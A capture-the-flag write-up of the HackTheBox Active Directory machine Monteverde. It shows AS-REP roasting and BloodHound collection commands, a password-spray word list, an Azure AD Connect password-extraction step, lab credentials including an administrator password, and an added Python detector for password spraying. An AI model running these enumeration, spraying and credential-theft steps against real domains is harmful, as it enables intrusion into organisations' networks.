CTF-Writeups/HackTheBox/Monteverde.md


2021-12-11 15:23:56 +00:00
# HackTheBox - Monteverde
## NMAP
```bash
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-12-11 11:29:48Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
59490/tcp open msrpc Microsoft Windows RPC
Host script results:
|_clock-skew: -1s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-12-11T11:32:09
|_ start_date: N/A
NSE: Script Post-scanning.
```
From the nmap scan we can see that port 88 (Kerberos) is open alongside LDAP on 389/3268, so this machine is an Active Directory domain controller.
## PORT 139/445 (SMB)
We can first check whether the SMB shares are accessible over an unauthenticated null session.
<img src="https://i.imgur.com/uLMLvqY.png"/>
We were logged in but no shares were listed, so moving on. We can use `enum4linux` or `windapsearch`, which enumerate users through `LDAP` queries. The nmap scan gives us the domain name, `MEGABANK.local`, so add that to the `/etc/hosts` file first.
<img src="https://i.imgur.com/ascUJe4.png"/>
This lists service accounts and domain users. Let's try the same with enum4linux-ng.
<img src="https://i.imgur.com/AovizRf.png"/>
This tool gives better results, so I'll go with it and note the usernames in a text file.
<img src="https://i.imgur.com/JLz21lM.png"/>
<img src="https://i.imgur.com/uwyRAg7.png"/>
Next I checked which users have Kerberos pre-authentication disabled, since that would let me obtain an AS-REP hash for the account.
```bash
python3 GetNPUsers.py -dc-ip 10.10.10.172 MEGABANK.local/arz -usersfile ~/Notes/CTFs/HTB/Medium/Monteverde/users.txt
```
<img src="https://i.imgur.com/ExajSLn.png"/>
But we had no luck with AS-REP roasting. Next we could try some common passwords against SMB, so I created a list of common passwords:
```
12345678
admin
dgalanos
roleary
smorgan
password
password123
Password
Password123
1234567
```
<img src="https://i.imgur.com/mxUfCRV.png"/>
That didn't work either, so I tried the list of usernames as the password list.
<img src="https://i.imgur.com/88g93wf.png"/>
This found a valid username and password for SMB. I tried the same pair on WinRM to see if I could get a shell, but sadly it wasn't valid for WinRM.
<img src="https://i.imgur.com/7DDNerC.png"/>
<img src="https://i.imgur.com/cAS3Z7A.png"/>
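The spray above leaves a very recognisable trace on the domain controller: one source address failing against many different accounts, one or two attempts each, followed by a success. The following is an added detection example written for this writeup (not part of the original post or any tool it uses); the event records are constructed sample data whose fields mirror the EventData of Windows events 4625/4624, and the source addresses are made up.

```python
"""Flag password-spray patterns in constructed Windows logon events."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: (timestamp, event id, target user, source ip, status).
# 0xC000006D is the NTSTATUS for "bad username or password" in event 4625.
SAMPLE_EVENTS = [
    ("2021-12-11T11:40:01", 4625, "dgalanos", "10.10.14.7", "0xC000006D"),
    ("2021-12-11T11:40:01", 4625, "roleary", "10.10.14.7", "0xC000006D"),
    ("2021-12-11T11:40:02", 4625, "smorgan", "10.10.14.7", "0xC000006D"),
    ("2021-12-11T11:40:02", 4625, "mhope", "10.10.14.7", "0xC000006D"),
    ("2021-12-11T11:40:03", 4625, "SABatchJobs", "10.10.14.7", "0xC000006D"),
    ("2021-12-11T11:40:03", 4624, "SABatchJobs", "10.10.14.7", "0x0"),  # success after spray
    ("2021-12-11T09:05:00", 4625, "mhope", "10.10.10.50", "0xC000006D"),  # one user, benign
    ("2021-12-11T09:05:30", 4625, "mhope", "10.10.10.50", "0xC000006D"),
]


def detect_spray(events, window=timedelta(minutes=10), min_accounts=4, max_per_account=2):
    """Return {source_ip: sorted distinct accounts} for every source that failed
    against at least `min_accounts` distinct users within `window` of its first
    failure, with no single account tried more than `max_per_account` times.
    That low-and-wide shape separates a spray from a user mistyping a password."""
    failures = defaultdict(list)  # source ip -> [(timestamp, user)]
    for ts, event_id, user, ip, _status in events:
        if event_id == 4625:
            failures[ip].append((datetime.fromisoformat(ts), user))
    hits = {}
    for ip, attempts in failures.items():
        attempts.sort()
        start = attempts[0][0]
        per_user = defaultdict(int)
        for ts, user in attempts:
            if ts - start <= window:
                per_user[user] += 1
        if len(per_user) >= min_accounts and max(per_user.values()) <= max_per_account:
            hits[ip] = sorted(per_user)
    return hits


def spray_then_success(events, sprayers):
    """Accounts that later logged on (4624) from a source flagged as spraying:
    these are the credentials the attacker actually found and should be reset."""
    return sorted({u for _, eid, u, ip, _ in events if eid == 4624 and ip in sprayers})


if __name__ == "__main__":
    found = detect_spray(SAMPLE_EVENTS)
    print("spraying sources:", found)
    print("compromised accounts:", spray_then_success(SAMPLE_EVENTS, found))
```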
We have read access to `azure_uploads`, but it was empty.
<img src="https://i.imgur.com/GdqKo7l.png"/>
## Foothold
Checking the `users$` share, we see an `azure.xml` file in `mhope`'s directory.
<img src="https://i.imgur.com/fthQiHp.png"/>
Reading the XML, we find a cleartext password.
<img src="https://i.imgur.com/09tY5r0.png"/>
Let's run crackmapexec again to check whether the password is valid.
<img src="https://i.imgur.com/bx9HE1a.png"/>
With `evil-winrm` we can use it to log in over WinRM. After logging in we can see that this user is in the `Azure Admins` group.
<img src="https://i.imgur.com/ZiXIvSO.png"/>
Upload `Sharphound.ps1`, which collects information about the AD, and then use that data to enumerate the AD with `bloodhound`.
<img src="https://i.imgur.com/IO39L01.png"/>
```powershell
Invoke-Bloodhound -CollectionMethod All -Domain MEGABANK.local -ZipFileName loot.zip
```
<img src="https://i.imgur.com/hcYJRf3.png"/>
We can download this archive with evil-winrm's download function, which requires the absolute path of the file.
<img src="https://i.imgur.com/euT3S5F.png"/>
Now launch `neo4j console` and `bloodhound`, and import the JSON files you get after extracting the archive.
<img src="https://i.imgur.com/s4wygU1.png"/>
Run any one of the built-in queries to confirm the data actually loaded.
<img src="https://i.imgur.com/pW0YTB0.png"/>
But here I didn't find anything that would help me escalate privileges.
<img src="https://i.imgur.com/eRY82TY.png"/>
## Privilege Escalation
Now remember that we saw mhope was in the Azure Admins group, so maybe we have to abuse that. Searching for Azure AD related exploits, I found an article describing how to exploit the Azure AD Connect database to recover the plaintext password of the sync account.
<img src="https://i.imgur.com/BwbZJTG.png"/>
Download the executable for this exploit from here
https://github.com/VbScrub/AdSyncDecrypt/releases
<img src="https://i.imgur.com/jdBsHAp.png"/>
Now upload the exe and the dll file. To run it we need to be in `C:\Program Files\Microsoft Azure AD Sync\Bin` and execute the exe from there (it doesn't matter where we upload it).
<img src="https://i.imgur.com/EANqNET.png"/>
<img src="https://i.imgur.com/64O8bgU.png"/>
This gives us the administrator's password.
<img src="https://i.imgur.com/oZk1HoM.png"/>
We can then further extract user hashes
<img src="https://i.imgur.com/HJAqL8C.png"/>
## References
https://vbscrub.com/2020/01/14/azure-ad-connect-database-exploit-priv-esc/
```bash
# Credentials found by spraying the usernames as passwords (user:password)
SABatchJobs:SABatchJobs
# Connect to the azure_uploads share as SABatchJobs
smbclient -U 'SABatchJobs' \\\\10.10.10.172\\azure_uploads
# List the shares visible to SABatchJobs
smbclient -U SABatchJobs -L \\\\10.10.10.172
```
Administrator:d0m@in4dminyeah!